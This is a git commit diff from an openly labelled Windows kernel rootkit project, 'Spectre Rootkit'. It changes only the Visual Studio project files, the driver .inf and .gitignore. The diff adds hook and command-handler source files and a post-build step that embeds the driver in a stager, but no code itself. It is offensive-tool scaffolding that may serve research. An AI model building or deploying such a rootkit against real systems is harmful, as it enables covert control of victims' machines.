Misc. fixes and improvements.

ifishzz · Jul 1, 2020 · f228053 · f228053
1 parent 31fcd63
commit f228053
Show file tree

Hide file tree

Showing 6 changed files with 137 additions and 153 deletions.
diff --git a/.gitignore b/.gitignore
@@ -348,3 +348,6 @@ MigrationBackup/
 
 # Ionide (cross platform F# VS Code tools) working folder
 .ionide/
+
+# Spectre Driver Header
+SpectreDriver.h
diff --git a/spectre/spectre kernel/spectre kernel.vcxproj b/spectre/spectre kernel/spectre kernel.vcxproj
@@ -26,31 +26,32 @@
     <Configuration>Debug</Configuration>
     <Platform Condition="'$(Platform)' == ''">Win32</Platform>
     <RootNamespace>spectre_kernel</RootNamespace>
+    <ProjectName>spectre-kernel</ProjectName>
   </PropertyGroup>
   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
-    <TargetVersion>Windows10</TargetVersion>
+    <TargetVersion>Windows7</TargetVersion>
     <UseDebugLibraries>true</UseDebugLibraries>
     <PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
     <ConfigurationType>Driver</ConfigurationType>
     <DriverType>WDM</DriverType>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
-    <TargetVersion>Windows10</TargetVersion>
+    <TargetVersion>Windows7</TargetVersion>
     <UseDebugLibraries>false</UseDebugLibraries>
     <PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
     <ConfigurationType>Driver</ConfigurationType>
     <DriverType>WDM</DriverType>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
-    <TargetVersion>Windows10</TargetVersion>
+    <TargetVersion>Windows7</TargetVersion>
     <UseDebugLibraries>true</UseDebugLibraries>
     <PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
     <ConfigurationType>Driver</ConfigurationType>
     <DriverType>WDM</DriverType>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
-    <TargetVersion>Windows10</TargetVersion>
+    <TargetVersion>Windows7</TargetVersion>
     <UseDebugLibraries>false</UseDebugLibraries>
     <PlatformToolset>WindowsKernelModeDriver10.0</PlatformToolset>
     <ConfigurationType>Driver</ConfigurationType>
@@ -86,6 +87,7 @@
     </ClCompile>
     <Link>
       <AdditionalOptions>/INTEGRITYCHECK %(AdditionalOptions)</AdditionalOptions>
+      <AdditionalDependencies>%(AdditionalDependencies)</AdditionalDependencies>
     </Link>
   </ItemDefinitionGroup>
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
@@ -95,11 +97,21 @@
     <Link />
     <Link>
       <AdditionalOptions>/INTEGRITYCHECK %(AdditionalOptions)</AdditionalOptions>
+      <AdditionalDependencies>%(AdditionalDependencies)</AdditionalDependencies>
     </Link>
+    <PostBuildEvent />
+    <PreBuildEvent>
+      <Command>
+      </Command>
+    </PreBuildEvent>
+    <PostBuildEvent>
+      <Command>"$(OutDir)\spectre-stager-util.exe" "$(TargetPath)" "$(SolutionDir)\spectre-stager\SpectreDriver.h"</Command>
+    </PostBuildEvent>
   </ItemDefinitionGroup>
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
     <Link>
       <AdditionalOptions>/INTEGRITYCHECK %(AdditionalOptions)</AdditionalOptions>
+      <AdditionalDependencies>%(AdditionalDependencies)</AdditionalDependencies>
     </Link>
     <ClCompile>
       <EnablePREfast>true</EnablePREfast>
@@ -108,36 +120,57 @@
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
     <Link>
       <AdditionalOptions>/INTEGRITYCHECK %(AdditionalOptions)</AdditionalOptions>
+      <AdditionalDependencies>%(AdditionalDependencies)</AdditionalDependencies>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <Profile>false</Profile>
     </Link>
     <ClCompile>
       <EnablePREfast>true</EnablePREfast>
+      <DebugInformationFormat>
+      </DebugInformationFormat>
     </ClCompile>
+    <PostBuildEvent />
+    <PreBuildEvent>
+      <Command>
+      </Command>
+    </PreBuildEvent>
+    <PostBuildEvent>
+      <Command>"$(OutDir)\spectre-stager-util.exe" "$(TargetPath)" "$(SolutionDir)\spectre-stager\SpectreDriver.h"</Command>
+    </PostBuildEvent>
   </ItemDefinitionGroup>
   <ItemGroup>
-    <Inf Include="spectrekernel.inf" />
+    <Inf Include="spectre-kernel.inf" />
   </ItemGroup>
   <ItemGroup>
     <FilesToPackage Include="$(TargetPath)" />
   </ItemGroup>
   <ItemGroup>
     <ClCompile Include="AfdHook.cpp" />
+    <ClCompile Include="CommandPacketHandler.cpp" />
     <ClCompile Include="common.cpp" />
+    <ClCompile Include="CreateThreadHook.cpp" />
     <ClCompile Include="FileObjHook.cpp" />
+    <ClCompile Include="NtFunctionResolver.cpp" />
     <ClCompile Include="PacketDispatch.cpp" />
     <ClCompile Include="PacketHandler.cpp" />
     <ClCompile Include="PingPacketHandler.cpp" />
+    <ClCompile Include="ProcessQueue.cpp" />
     <ClCompile Include="spectre.cpp" />
     <ClCompile Include="Utils.cpp" />
     <ClCompile Include="XorPacketHandler.cpp" />
   </ItemGroup>
   <ItemGroup>
     <ClInclude Include="AfdHook.h" />
+    <ClInclude Include="CommandPacketHandler.h" />
     <ClInclude Include="common.h" />
+    <ClInclude Include="CreateThreadHook.h" />
     <ClInclude Include="FileObjHook.h" />
     <ClInclude Include="ntdef.h" />
+    <ClInclude Include="NtFunctionResolver.h" />
     <ClInclude Include="PacketHandler.h" />
     <ClInclude Include="PacketDispatch.h" />
     <ClInclude Include="PingPacketHandler.h" />
+    <ClInclude Include="ProcessQueue.h" />
     <ClInclude Include="shared.h" />
     <ClInclude Include="Utils.h" />
     <ClInclude Include="XorPacketHandler.h" />

diff --git a/spectre/spectre kernel/spectre kernel.vcxproj.filters b/spectre/spectre kernel/spectre kernel.vcxproj.filters
@@ -29,11 +29,12 @@
     <Filter Include="Source Files\Packet Handlers">
       <UniqueIdentifier>{fc6ef4fb-4128-401b-92ca-cdc57742f57d}</UniqueIdentifier>
     </Filter>
-  </ItemGroup>
-  <ItemGroup>
-    <Inf Include="spectrekernel.inf">
-      <Filter>Driver Files</Filter>
-    </Inf>
+    <Filter Include="Header Files\Utilities">
+      <UniqueIdentifier>{064adcb9-967b-48d5-9059-7a164e0fc9cd}</UniqueIdentifier>
+    </Filter>
+    <Filter Include="Source Files\Utilities">
+      <UniqueIdentifier>{ab615baa-b030-4ad6-8b9f-e1376ce4729f}</UniqueIdentifier>
+    </Filter>
   </ItemGroup>
   <ItemGroup>
     <ClCompile Include="spectre.cpp">
@@ -42,9 +43,6 @@
     <ClCompile Include="common.cpp">
       <Filter>Source Files</Filter>
     </ClCompile>
-    <ClCompile Include="Utils.cpp">
-      <Filter>Source Files</Filter>
-    </ClCompile>
     <ClCompile Include="PacketDispatch.cpp">
       <Filter>Source Files</Filter>
     </ClCompile>
@@ -63,6 +61,21 @@
     <ClCompile Include="XorPacketHandler.cpp">
       <Filter>Source Files\Packet Handlers</Filter>
     </ClCompile>
+    <ClCompile Include="NtFunctionResolver.cpp">
+      <Filter>Source Files\Utilities</Filter>
+    </ClCompile>
+    <ClCompile Include="Utils.cpp">
+      <Filter>Source Files\Utilities</Filter>
+    </ClCompile>
+    <ClCompile Include="ProcessQueue.cpp">
+      <Filter>Source Files\Utilities</Filter>
+    </ClCompile>
+    <ClCompile Include="CreateThreadHook.cpp">
+      <Filter>Source Files\Hooks</Filter>
+    </ClCompile>
+    <ClCompile Include="CommandPacketHandler.cpp">
+      <Filter>Source Files\Packet Handlers</Filter>
+    </ClCompile>
   </ItemGroup>
   <ItemGroup>
     <ClInclude Include="ntdef.h">
@@ -71,9 +84,6 @@
     <ClInclude Include="common.h">
       <Filter>Header Files</Filter>
     </ClInclude>
-    <ClInclude Include="Utils.h">
-      <Filter>Header Files</Filter>
-    </ClInclude>
     <ClInclude Include="shared.h">
       <Filter>Header Files</Filter>
     </ClInclude>
@@ -92,8 +102,28 @@
     <ClInclude Include="AfdHook.h">
       <Filter>Header Files\Hooks</Filter>
     </ClInclude>
+    <ClInclude Include="NtFunctionResolver.h">
+      <Filter>Header Files\Utilities</Filter>
+    </ClInclude>
+    <ClInclude Include="Utils.h">
+      <Filter>Header Files\Utilities</Filter>
+    </ClInclude>
+    <ClInclude Include="ProcessQueue.h">
+      <Filter>Header Files\Utilities</Filter>
+    </ClInclude>
+    <ClInclude Include="CreateThreadHook.h">
+      <Filter>Header Files\Hooks</Filter>
+    </ClInclude>
     <ClInclude Include="XorPacketHandler.h">
       <Filter>Header Files\Packet Handlers</Filter>
     </ClInclude>
+    <ClInclude Include="CommandPacketHandler.h">
+      <Filter>Header Files\Packet Handlers</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <Inf Include="spectre-kernel.inf">
+      <Filter>Driver Files</Filter>
+    </Inf>
   </ItemGroup>
 </Project>
diff --git a/spectre/spectre kernel/spectrekernel.inf → spectre/spectre kernel/spectre-kernel.inf b/spectre/spectre kernel/spectrekernel.inf → spectre/spectre kernel/spectre-kernel.inf
@@ -1,5 +1,5 @@
 ;
-; spectrekernel.inf
+; spectre-kernel.inf
 ;
 
 [Version]
@@ -11,7 +11,7 @@ Class = "ActivityMonitor"
 ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2}
 Provider    = %ManufacturerName%
 DriverVer   = 12/17/2019,1.0.0.0
-CatalogFile = spectrekernel.cat
+CatalogFile = spectre-kernel.cat
 
 [DestinationDirs]
 DefaultDestDir          = 12
@@ -70,7 +70,7 @@ HKR,"Instances\"%Instance1.Name%,"Flags",0x00010001,%Instance1.Flags%
 %DriverName%.sys
 
 [SourceDisksFiles]
-spectrekernel.sys = 1,,
+spectre-kernel.sys = 1,,
 
 [SourceDisksNames]
 1 = %DiskId1%,,,
@@ -82,7 +82,7 @@ spectrekernel.sys = 1,,
 ManufacturerName        = "Bill Demirkapi"
 ServiceDescription      = "Spectre Rootkit Driver"
 ServiceName             = "Spectre Rootkit"
-DriverName              = "spectrekernel"
+DriverName              = "spectre-kernel"
 DiskId1                 = "Spectre Rootkit Device Installation Disk"
 ;Instances specific information.
 DefaultInstance         = "Default Instance"